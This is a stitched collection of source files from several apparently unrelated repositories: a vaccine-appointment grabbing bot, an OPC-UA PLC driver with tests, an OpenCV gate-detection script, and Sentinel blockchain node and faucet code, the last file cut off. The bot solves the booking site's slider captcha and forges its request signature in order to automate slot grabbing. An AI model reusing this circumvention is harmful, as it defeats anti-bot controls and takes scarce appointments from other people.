url = "https://wx.scmttec.com/order/subscribe/workDaysByMonth.do"
head = getConfig()
data = {
"depaCode": __value__["depaCode"],
"linkmanId": __value__["linkmanId"],
"vaccCode": __value__["vaccineCode"],
"vaccIndex": __value__["vaccineIndex"],
"departmentVaccineId": __value__["departmentVaccineId"],
"month": "2022-05-1",
}
r = requests.get(url, headers=head, params=data)
print("订单页面 可选日期", r.text)
a = json.loads(r.text)
i = a.get("data").get("dateList")
__value__["subscribeDate"] = i[1]
# Order page: specific time slots for the chosen date
def getWorkTime():
url = "https://wx.scmttec.com/subscribe/subscribe/departmentWorkTimes2.do"
head = getConfig()
data = {
"depaCode": __value__["depaCode"],
"vaccCode": __value__["vaccineCode"],
"vaccIndex": __value__["vaccineIndex"],
"subsribeDate": __value__["subscribeDate"],
"departmentVaccineId": __value__["departmentVaccineId"],
"linkmanId": __value__["linkmanId"],
"idCardNo": __value__["idCardNo"],
}
r = requests.get(url, headers=head, params=data)
print("具体日期:", r.text)
a = json.loads(r.text)
if a["ok"] == False:
print(a["msg"])
else:
i = a.get("data").get("times").get("data")
__value__["subscirbeTime"] = i[0]["id"]
# Randomly generate a UUID
def createUUID():
uuid = []
for i in range(36):
j = random.randint(0, 15)
uuid += "0123456789abcdef"[j]
uuid[14] = "4"
try:
uuid[19] = int(uuid[19])
# print("尝试",uuid[19])
except:
uuid[19] = random.randint(0, 9)
# print("修改",uuid[19])
uuid[19] = "0123456789abcdef"[3 & uuid[19] | 8]
uuid[8] = uuid[13] = uuid[18] = uuid[23] = "-"
return ("slider-" + "".join(uuid))
# Fetch the captcha
def getCaptcha():
url = "https://wx.scmttec.com/captcha/captcha/v2/get.do"
url2 = "http://httpbin.org/post"
head = getConfig()
timestamp = time.time()
timestamp = int(timestamp * 1000)
data = {
"captchaType": "blockPuzzle",
"clientUid": "slider-f893f399-33d9-485f-8b27-7327e8cb82c0", # "slider-f893f399-33d9-485f-8b27-7327e8cb82c0",此处可替换为createUUID(),随机一个UUID()
"ts": int(timestamp)
}
r = requests.post(url, headers=head, json=data)
a = json.loads(r.text)
# print(r.text)
i = a.get("data").get("repData")
print("获取验证码:", i)
__value__["token"] = i.get("token")
return i
# Submit the captcha answer
def checkCaptcha(token=None, point_text=None):
url = "https://wx.scmttec.com/captcha/captcha/v2/check.do"
head = getConfig()
data = {
"captchaType": "blockPuzzle",
"pointJson": point_text,
"token": token
}
r = requests.post(url, headers=head, json=data)
a = json.loads(r.text)
print("验证码结果:", r.text)
i = a.get("data").get("repData")
return i
# Captcha verification
def orderCheck():
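    # Flow (as implemented below): fetch a captcha, decode its image, locate the
    # slider's x offset, encrypt the {"x": ..., "y": 5} point with the returned
    # secretKey, submit it for checking, then store the encrypted
    # "token---point" string as __value__["captchaVerification"].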
i = getCaptcha()
captcha.b64ToImage(i)
token = i.get("token")
key = i.get("secretKey")
# print("key ", key, "token ", token)
x = image.readImage()
num = random.uniform(0.5111111111111, 0.9115111111111)
point_x = ("%.13f") % (float(x) + num)
point_dict = {"x": float(point_x), "y": 5}
    raw_text = json.dumps(point_dict, separators=(',', ':'))  # by default json.dumps inserts spaces, which would affect the result
en_point_text = captcha.enPoint(raw_text, key)
res = checkCaptcha(point_text= en_point_text,token=token)
# en_point_text = captcha.enPoint(x, key)
# checkCaptcha(token, en_point_text)
captchaVerification = captcha.enPoint(token + "---" + raw_text, key)
__value__["captchaVerification"] = captchaVerification
def nowTime():
url = "https://wx.scmttec.com/base//time/now.do"
head = getConfig()
r = requests.get(url, headers=head)
time = json.loads(r.text).get("data")
return time
"""----------------提交购买参数----------------"""
def subscribeAdd():
url = "https://wx.scmttec.com/subscribe/subscribe/add.do"
end = 'fuckhacker10000'
head = getConfig()
data = __value__
# times = nowTime()
# times = times.replace('-', '').replace(' ', '').replace(':', '')[0:12]
times = time.strftime("%Y%m%d%H%M")
times = times + str(__value__["subscirbeTime"]) + end
times = md5(times.encode("utf8")).hexdigest()
data["depaCode"] = data["depaCode"] + "_" + times
while True:
if int(time.strftime("%H%M%S")) > int("163000") or 1:
r = requests.get(url, headers=head, params=data)
break
else:
print("等待提交订单")
print("购买结果", r.text)
return r.text
def startSubscribe():
getBaseInfo()
isCanSubscribe()
if int(time.strftime("%H%M%S")) > int("163000") or 1: #简单的时间控制,16点30分00秒之后开始运行,or 1 则忽略时间直接运行
getWorkDay()
getWorkTime()
# orderCheck()
res = subscribeAdd()
return res
if __name__ == '__main__':
orderCheck()
i = 0
while True:
i = i + 1
if int(time.strftime("%H%M%S")) >= int("162958") or 1:#简单的时间控制,16点29分58秒之后开始运行,or 1 则忽略时间直接运行
try:
time.sleep(0.2)
print("[Info]:尝试运行")
res = startSubscribe()
res = json.loads(res)
except BaseException as e:
with open("out.log", "a+", encoding="utf8") as f:
print("[Error]:跳过循环", sys.exc_info())
print("[Error]:跳过循环", sys.exc_info(), file=f)
time.sleep(5)
continue
if res["code"] == "0000" or res["code"] == "9999":
print("[Success]:退出循环")
break
else:
print(res["msg"])
else:
print("<", i)
print(__value__)
``` |
{
"source": "1487quantum/packml_ros2",
"score": 2
} |
#### File: packml_plc/packml_plc/packml_plc_sender.py
```python
import time
from opcua import Client, ua
from packml_msgs.srv import Transition
import rclpy
from rclpy.node import Node
class DriverSender(Node):
"""This class controls the PLC's SM transition by pressing buttons on the GUI."""
def __init__(self):
super().__init__('driver_sender')
self.srv = self.create_service(Transition, 'transition', self.trans_request)
self.client = Client('opc.tcp://192.168.125.2:4840/freeopcua/server/')
def connect(self):
self.client.connect()
def __exit__(self, exc_type, exc_val, exc_tb):
self.client.disconnect()
def trans_request(self, req, res):
command_rtn = False
command_valid = True
command_int = req.command
print('Evaluating transition request command: ' + str(command_int))
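        # Command codes mapped in the elif chain below: 1=Clear, 2=Start,
        # 3=Stop, 4=Hold, 5=Abort, 6=Reset, 7=Stop, 100=Suspend,
        # 101=Unsuspend, 102=Unhold.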
try:
if command_int == 5:
cmd_abort = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\"' +
'.\"Unit\".\"Cmd_Abort\"')
cmd_abort.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Abort Command . . .')
command_rtn = True
elif command_int == 7:
cmd_stop = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Stop\""')
cmd_stop.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Stop Command . . .')
command_rtn = True
elif command_int == 1:
cmd_clear = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Clear\"')
cmd_clear.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Clear Command . . .')
command_rtn = True
elif command_int == 4:
cmd_hold = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Hold\"')
cmd_hold.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Hold Command . . .')
command_rtn = True
elif command_int == 6:
cmd_reset = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Reset\"')
cmd_reset.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Reset Command . . .')
command_rtn = True
elif command_int == 2:
cmd_start = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Start\"')
cmd_start.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Start Command . . .')
command_rtn = True
elif command_int == 3:
cmd_stop = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Stop\"')
cmd_stop.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.05)
print('Sending Stop Command . . .')
command_rtn = True
elif command_int == 100:
cmd_suspend = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Suspend\"')
cmd_suspend.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Suspend Command . . .')
command_rtn = True
elif command_int == 102:
cmd_unhold = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Unhold\"')
cmd_unhold.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Unhold Command . . .')
command_rtn = True
elif command_int == 101:
cmd_unsuspend = self.client.get_node('ns=3;' +
's=\"PackML_Status\".\"EM00\".' +
'\"Unit\".\"Cmd_Unsuspend\"')
cmd_unsuspend.set_attribute(ua.AttributeIds.Value, ua.DataValue(True))
time.sleep(0.1)
print('Sending Unsuspend Command . . .')
command_rtn = True
else:
command_valid = False
except KeyboardInterrupt:
pass
if command_valid:
if command_rtn:
print('Successful transition request command: ' + str(command_int))
res.success = True
res.error_code = res.SUCCESS
else:
res.success = False
res.error_code = res.INVALID_TRANSITION_REQUEST
else:
res.success = False
res.error_code = res.UNRECGONIZED_REQUEST
return res
def main(args=None):
rclpy.init(args=args)
driver_sender = DriverSender()
driver_sender.connect()
rclpy.spin(driver_sender)
if __name__ == '__main__':
main()
```
#### File: packml_plc/test/test_packml_plc_listener.py
```python
import threading
import unittest
from unittest.mock import MagicMock
from packml_msgs.srv import AllStatus
from packml_plc.packml_plc_listener import DriverListener
from packml_plc.packml_plc_listener import HelloClient
from packml_plc.packml_plc_listener import main
from packml_plc.packml_plc_listener import newvals, thee
from packml_plc.packml_plc_listener import plc_listener
import rclpy
class TestMethods(unittest.TestCase):
def test_helloclient(self):
client = HelloClient('freeopcua/server/')
client.client.connect = MagicMock()
client.client.disconnect = MagicMock()
client.__enter__()
client.__exit__(1, 1, 1)
def test_driverlistener(self):
rclpy.init(args=None)
driver = DriverListener()
driver.create_service = MagicMock()
self.assertNotEqual(driver.srv, [])
res = AllStatus.Response()
driver.send_data(0, res)
self.assertNotEqual(res, [])
rclpy.shutdown()
def test_plclistener(self):
HelloClient.__enter__ = MagicMock()
HelloClient.__exit__ = MagicMock()
e = threading.Event()
listener = threading.Timer(1.0, plc_listener, args=(e,))
listener.start()
listener.join(5)
e.set()
self.assertEqual(newvals, [False, False, False, False, False, False,
False, False, False, False, False, False,
False, False, False, False, False])
def test_main(self):
rclpy.spin = MagicMock()
main()
thee.set()
``` |
{
"source": "1487quantum/Ray-X",
"score": 2
} |
#### File: Ray-X/cv3/gatedetectPy3_serial.py
```python
import numpy as np
import cv2
import math
import serial
import time
# configure the serial connections (the parameters differs on the device you are connecting to)
ser = serial.Serial(
port='/dev/ttyACM0',
baudrate=9600,
parity=serial.PARITY_ODD,
stopbits=serial.STOPBITS_TWO,
bytesize=serial.SEVENBITS
)
ser.isOpen()
#cap = cv2.VideoCapture('s.mp4')
cap = cv2.VideoCapture(0)
#Vid
vidScale = 0.5 #Img scale ratio
roiS = 0.25 #ROI start (x-axis)
roiE = 0.75 #ROI end (x-axis)
#Viz
vizClr = (255,255,255)
#Target cross param
cl = 10 #Cross length
crts = 0.5 #Cross ratio to image size
#Centre of gate
gc = 0
#List of Steer
lstS = []
d=0 #Counter for lstS
#Save vid out param
#fourcc = cv2.VideoWriter_fourcc(*'MJPG')
#out = cv2.VideoWriter('test.avi', fourcc, 10, (640, 360),True) #Out, codec, fps, res, use 3 clr channel bool
def main():
while 1:
ret, img = cap.read()
img = cv2.resize(img, (0,0), fx=vidScale, fy=vidScale)
height, width = img.shape[:2] #Get Height, width of img
#Set ROI start end loc
rS = int(roiS*width)
rE = int(roiE*width)
#Set target cross w & h
cw = int(crts*width)
ch = int(crts*height)
#Set the center of gate to be in the middle initially/if all fails
gc=int(width/2)
#Change to HSV colorspace
hsv_image = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
h, s, v = cv2.split(hsv_image)
#Visualisation
#Draw line overlay boundary for visualisation
cv2.line(img, (rS, int(height/3)), (rS, int(2*height/3)), vizClr, 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.line(img, (rE, int(height/3)), (rE, int(2*height/3)), vizClr, 2, cv2.LINE_AA)
#Target Cross
cv2.line(img, (cw, ch-cl), (cw, ch+cl), vizClr, 1, cv2.LINE_AA)
cv2.line(img, (cw-cl, ch), (cw+cl, ch), vizClr, 1, cv2.LINE_AA)
#Make another copy of img
imgDebug=img.copy()
#Set ROI: roi = gray[y1:y2, x1:x2]
vr = v[0:height,rS:rE]
# noise removal
kernelN = np.ones((3,3),np.uint8)
opening = cv2.morphologyEx(vr,cv2.MORPH_OPEN,kernelN, iterations = 4)
#Erode and Enhance side bars (Emphasis kernel more on y-axis)
kernelS = np.ones((3,9), np.uint8)
img_es = cv2.erode(opening, kernelS, iterations=6)
#Median Blur to ensure connectivity
img_esB = cv2.medianBlur(img_es,15)
#Upper range threshold: Set value above 170 to 0 (Used lightness value via imshow of dilated img to determine cutoff)
th0, img_esBT = cv2.threshold(img_esB, 170, 0, cv2.THRESH_TRUNC)
#cv2.imshow("UpperT",img_esBT)
#Dilate img
kernelD = np.ones((7,7), np.uint8)
img_esBTD = cv2.dilate(img_esBT, kernelD, iterations=7)
#cv2.imshow("Dilate",img_esBTD)
#Now let's make it Binary: Binary thresholding (Set val below thres to max value)
th1, img_esBTD = cv2.threshold(img_esBTD, 165, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
#cv2.imshow('Bin',img_esBTD)
#Erode again
kernelD = np.ones((1,1), np.uint8)
img_esBTDe = cv2.erode(img_esBTD, kernelD, iterations=2)
#cv2.imshow('Erode2',img_esBTDe)
_, contours, _ = cv2.findContours(img_esBTDe,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
ctrList=[None]*len(contours) #Initialise with NoneType, Get list of center loc of only X-axis
l=0 #mntList Tracker
for k, c in enumerate(contours):
area = cv2.contourArea(c)
if (area > 700)and(area < 20000):
# compute the center of the contour
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
ctrList[l]=cX
#Debug Image
#Draw the contour and center of the shape on the image (+rS to Compensate ROI x-axis offset)
cv2.drawContours(imgDebug, [c], -1, (255, 0, 0), 2, offset=(rS,0))
cv2.circle(imgDebug, (rS+cX, cY), 5, vizClr, -1)
cv2.putText(imgDebug, "Center", (rS+cX - 20, cY - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
l+=1
#ctrList = filter(lambda x: x is not None, ctrList)
ctrList = [x for x in ctrList if x is not None] #Remove nonetype
#print(ctrList)
#Check whether point is within ROI
        ctrList = [z for z in ctrList if rS < rS + z < rE]  # z is measured from rS
#print ctrList
#print(ctrList)
if len(ctrList)>1:
gc=sum(ctrList)/len(ctrList)
elif len(ctrList)!=0:
gc=ctrList[0]
if not ctrList: #If empty
gc=width/2-rS #Remove double offset
#print gc
lstS.append(gc) #Add to list to calculate moving average of steer to use
#Take moving average of 10 value to smooth gate centre
tmpAvg = running_mean(lstS,10)
if len(tmpAvg)>0:
mavg = int(tmpAvg[len(tmpAvg)-1])
else:
mavg=int(width/2)
#Motion strength (Range: +/-0<->100), Right-> blue, left -> red
#Raw
diffRC =width/2-(rS+gc) #Diff from center & target
diffRR = int(100*(float(diffRC)/((rS-rE)/2))) #Get strength ratio to be applied
#Smooth
diffSC =width/2-(rS+mavg) #Diff from center & target
diffSR = int(100*(float(diffSC)/((rS-rE)/2))) #Get strength ratio to be applied
#Viz
#Draw smooth target line (Have to compensate for ROI x-axis offset)
cv2.line(img, (rS+mavg, int(height/3)), (rS+mavg, int(2*height/3)), (100, 255, 0), 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.putText(img, "Steer: "+str(diffSR), (rS, 70+int(2*height/3)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1) #Show smoothed target as final
#print diffR
#Draw gauge below
if (diffSC>0): #Right
cv2.line(img, (int(rS+mavg), 20+int(2*height/3)), (int(width/2), 20+int(2*height/3)), (0, 0, 255), 3, cv2.LINE_AA) #x1,y1,x2,y2
else: #Left
cv2.line(img, (int(rS+mavg), 20+int(2*height/3)), (int(width/2), 20+int(2*height/3)), (255, 0, 0), 3, cv2.LINE_AA) #x1,y1,x2,y2
#For Debug
cv2.putText(imgDebug, "Steer (R): "+str(diffRR), (rS, 40+int(2*height/3)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
cv2.putText(imgDebug, "Steer (S): "+str(diffSR), (rS, 70+int(2*height/3)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
#Target line
#Draw raw target line (Have to compensate for ROI x-axis offset)
cv2.line(imgDebug, (int(rS+gc), int(height/3)), (int(rS+gc), int(2*height/3)), (0, 100, 255), 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.putText(imgDebug, "T-Raw", (int(rS+gc) - 20, int(height/3) - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
#Draw smooth target line (Have to compensate for ROI x-axis offset)
cv2.line(imgDebug, (rS+mavg, int(height/3)), (rS+mavg, int(2*height/3)), (100, 255, 0), 2, cv2.LINE_AA) #x1,y1,x2,y2
cv2.putText(imgDebug, "T-Smooth", (rS+mavg - 20, int(2*height/3) + 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, vizClr, 1)
#print ctrList,gc
mavgOut = int((diffSR+100)/22)
print(mavgOut)
ser.write(bytes([mavgOut])) #Need convert int to byte, current format foy py3 only
time.sleep(0.5) # with the port open, the response will be buffered
# so wait a bit longer for response here
#cv2.imshow('Main',img)
#cv2.imshow('Debug',imgDebug)
cv2.imwrite("/home/odroid/Desktop/q.jpg",imgDebug)
#out.write(imgDebug) #Save main img frame
#cv2.imshow('Edges',edges)
#sfc = cv2.waitKey(0)
k = cv2.waitKey(30) & 0xff
if k == 27:
break
cap.release()
    #out.release()  # the VideoWriter "out" is commented out above
cv2.destroyAllWindows()
ser.close()
def running_mean(x, N):
cumsum = np.cumsum(np.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N]) / float(N)
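# e.g. running_mean([1, 2, 3, 4, 5], 2) -> array([1.5, 2.5, 3.5, 4.5])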
if __name__ == "__main__":
main()
``` |
{
"source": "1490780232/competition",
"score": 2
} |
#### File: competition/config/configs.py
```python
from .default import DefaultConfig
class Config(DefaultConfig):
def __init__(self):
super(Config, self).__init__()
self.CFG_NAME = 'baseline'
self.COMBINE_DATASET=True
self.DATA_DIR = '/home/lzy/lzy/data/' #"market1501/Market-1501-v15.09.15"
self.PRETRAIN_CHOICE = 'imagenet'
self.PRETRAIN_PATH = '/home/lzy/.cache/torch/checkpoints/resnet50-19c8e357.pth'
self.LOG_DIR = "./log/pytorch1.7_bs_128_all_data" # log directory
self.OUTPUT_DIR = "./output_cuda10.1_bs_128_all_data" # saved model directory
self.LOSS_TYPE = 'triplet+softmax+center'
self.TEST_WEIGHT = './output_cuda10.1/resnet50_185.pth'
self.FLIP_FEATS = 'off'
self.HARD_FACTOR = 0.2
self.RERANKING = False #True
self.EVAL_PERIOD = 5 # validation period
self.CHECKPOINT_PERIOD = 20 # saving model period
``` |
{
"source": "1490780232/ocr_digital",
"score": 2
} |
#### File: ocr_digital/View/ui_main.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(815, 400)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 0, 801, 333))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.label_4 = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 3, 2, 1, 1)
self.label = QtWidgets.QLabel(self.gridLayoutWidget)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.savepath_browser = QtWidgets.QTextBrowser(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.savepath_browser.sizePolicy().hasHeightForWidth())
self.savepath_browser.setSizePolicy(sizePolicy)
self.savepath_browser.setObjectName("savepath_browser")
self.gridLayout.addWidget(self.savepath_browser, 1, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.videopath_browser = QtWidgets.QTextBrowser(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.videopath_browser.sizePolicy().hasHeightForWidth())
self.videopath_browser.setSizePolicy(sizePolicy)
self.videopath_browser.setMaximumSize(QtCore.QSize(16777213, 16777215))
self.videopath_browser.setObjectName("videopath_browser")
self.gridLayout.addWidget(self.videopath_browser, 0, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.data_count = QtWidgets.QLabel(self.gridLayoutWidget)
self.data_count.setObjectName("data_count")
self.gridLayout.addWidget(self.data_count, 2, 1, 1, 1)
self.saved2path = QtWidgets.QLabel(self.gridLayoutWidget)
self.saved2path.setObjectName("saved2path")
self.gridLayout.addWidget(self.saved2path, 3, 0, 1, 2)
self.run_buttom = QtWidgets.QPushButton(self.gridLayoutWidget)
self.run_buttom.setObjectName("run_buttom")
self.gridLayout.addWidget(self.run_buttom, 4, 1, 1, 1)
self.skipped_browser = QtWidgets.QTextBrowser(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.skipped_browser.sizePolicy().hasHeightForWidth())
self.skipped_browser.setSizePolicy(sizePolicy)
self.skipped_browser.setObjectName("skipped_browser")
self.gridLayout.addWidget(self.skipped_browser, 3, 3, 1, 1)
self.video_pushButton = QtWidgets.QPushButton(self.gridLayoutWidget)
self.video_pushButton.setObjectName("video_pushButton")
self.gridLayout.addWidget(self.video_pushButton, 0, 2, 1, 2)
self.savepath_pushButton = QtWidgets.QPushButton(self.gridLayoutWidget)
self.savepath_pushButton.setObjectName("savepath_pushButton")
self.gridLayout.addWidget(self.savepath_pushButton, 1, 2, 1, 2)
self.unit_comboBox = QtWidgets.QComboBox(self.gridLayoutWidget)
self.unit_comboBox.setObjectName("unit_comboBox")
self.unit_comboBox.addItem("")
self.unit_comboBox.addItem("")
self.gridLayout.addWidget(self.unit_comboBox, 2, 2, 1, 2)
self.checkout_pushButton = QtWidgets.QPushButton(self.gridLayoutWidget)
self.checkout_pushButton.setObjectName("checkout_pushButton")
self.gridLayout.addWidget(self.checkout_pushButton, 4, 2, 1, 2)
self.log_field = QtWidgets.QLabel(self.gridLayoutWidget)
self.log_field.setObjectName("log_field")
self.gridLayout.addWidget(self.log_field, 5, 0, 1, 4)
self.gridLayout.setColumnStretch(0, 3)
self.gridLayout.setColumnStretch(1, 30)
self.gridLayout.setColumnStretch(2, 1)
self.gridLayout.setColumnStretch(3, 10)
self.gridLayout.setRowStretch(0, 1)
self.gridLayout.setRowStretch(1, 1)
self.gridLayout.setRowStretch(2, 1)
self.gridLayout.setRowStretch(3, 1)
self.gridLayout.setRowStretch(4, 1)
self.gridLayout.setRowStretch(5, 20)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 815, 22))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_4.setText(_translate("MainWindow", "跳帧数"))
self.label.setText(_translate("MainWindow", "视频地址"))
self.label_2.setText(_translate("MainWindow", "保存地址"))
self.label_3.setText(_translate("MainWindow", "共提取"))
self.data_count.setText(_translate("MainWindow", "{}个数据"))
self.saved2path.setText(_translate("MainWindow", "保存至"))
self.run_buttom.setText(_translate("MainWindow", "RUN"))
self.skipped_browser.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Sans Serif\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">10</p></body></html>"))
self.video_pushButton.setText(_translate("MainWindow", "Browse..."))
self.savepath_pushButton.setText(_translate("MainWindow", "Browse..."))
self.unit_comboBox.setItemText(0, _translate("MainWindow", "有单位"))
self.unit_comboBox.setItemText(1, _translate("MainWindow", "无单位"))
self.checkout_pushButton.setText(_translate("MainWindow", "Checkout"))
self.log_field.setText(_translate("MainWindow", "TextLabel"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
``` |
{
"source": "14avengers/sentinel",
"score": 2
} |
#### File: sentinel/nodes/node.py
```python
import os
import subprocess
from .. import Config
from ..utils.string import generate_random_name
class Node:
def __init__(self, config=None, console=False, etherbase=None, identity=None,
miner=False, v5=False, rpc=True, verbosity=3):
if miner == True and etherbase == None:
raise ValueError('Etherbase shouldn\'t be `None` when mining is `True`')
self.config = Config() if config == None else config
self.geth_cmd = [
'geth',
'--datadir', self.config.SENTINEL_DATA_PATH
]
self.console = console
self.miner = miner
self.etherbase = etherbase
self.identity = generate_random_name() if identity == None else identity
self.v5 = v5
self.rpc = rpc
self.verbosity = verbosity
def init(self):
args = [ 'init', self.config.GENESIS_FILE ]
init_proc = subprocess.Popen(self.geth_cmd + args, shell=False)
init_proc.wait()
if init_proc.returncode != 0:
raise OSError('Failed to init geth :-(')
def start(self):
args = [
'--identity', self.identity,
'--networkid', self.config.NETWORK_ID,
'--bootnodes', self.config.BOOTNODE_URL,
'--verbosity', str(self.verbosity)
]
if self.rpc == True:
args += [
'--rpc',
'--rpcaddr=0.0.0.0',
'--rpcapi="{}"'.format(self.config.RPC_APIS)
]
if self.v5 == True:
args += [ '--v5disc' ]
if self.miner == True and self.etherbase != None:
args += [
'--mine',
'--etherbase', self.etherbase
]
if self.console == True:
args += [ 'console' ]
geth_proc = subprocess.Popen(self.geth_cmd + args, shell=False)
geth_proc.wait()
if geth_proc.returncode != 0:
raise OSError('Failed to start geth node :-(')
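# Usage sketch (assumes geth is on PATH and Config supplies the referenced
# paths, network ID and bootnode URL; the etherbase address is hypothetical):
#   node = Node(miner=True, etherbase='0x0000000000000000000000000000000000000000')
#   node.init()
#   node.start()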
```
#### File: sentinel/utils/string.py
```python
import string
import random
def generate_random_name(length=8):
return ''.join(random.choice(string.ascii_uppercase) for _ in range(length))
```
#### File: sentinel/dev/free.py
```python
import json
import falcon
from ..config import DECIMALS
from ..db import db
from ..helpers import eth_helper
def check_free(to_addr):
tx = db.free.find_one({
'to_addr': to_addr
})
    return tx is not None
def insert_free(to_addr):
_ = db.free.insert_one({
'to_addr': to_addr
})
class GetFreeAmount(object):
def on_post(self, req, resp):
account_addr = str(req.body['account_addr']).lower()
eths = int(0.25 * (10 ** 18))
sents = int(1000 * DECIMALS)
tx_done = check_free(account_addr)
if tx_done is True:
message = {
'success': False,
'message': 'Test Tokens already claimed'
}
else:
errors, tx_hashes = eth_helper.free(account_addr, eths, sents)
if len(errors) > 0:
message = {
'success': False,
'errors': errors,
'tx_hashes': tx_hashes,
'message': 'Error occurred while transferring free amount.'
}
else:
insert_free(account_addr)
message = {
'success': True,
'errors': errors,
'tx_hashes': tx_hashes,
'message': 'Successfully transferred Test Tokens'
}
resp.status = falcon.HTTP_200
resp.body = json.dumps(message)
```
#### File: sentinel/jobs/statistics.py
```python
import datetime
import time
from _thread import start_new_thread
from ..db import db
class DailyActiveNodes(object):
def __init__(self, hour=0, minute=0):
self.hour = hour
self.minute = minute
self.stop_thread = False
self.t = None
def thread(self):
while self.stop_thread is False:
current_time = datetime.datetime.now()
if (current_time.hour == self.hour) and (current_time.minute == self.minute):
nodes = {
'up': db.nodes.find({'vpn.status': 'up'}).count(),
'total': db.nodes.find().count()
}
current_time = datetime.datetime.combine(current_time, datetime.time(0))
timestamp = int(time.mktime(current_time.timetuple()))
_ = db.statistics.update({
'timestamp': timestamp
}, {
'$set': {
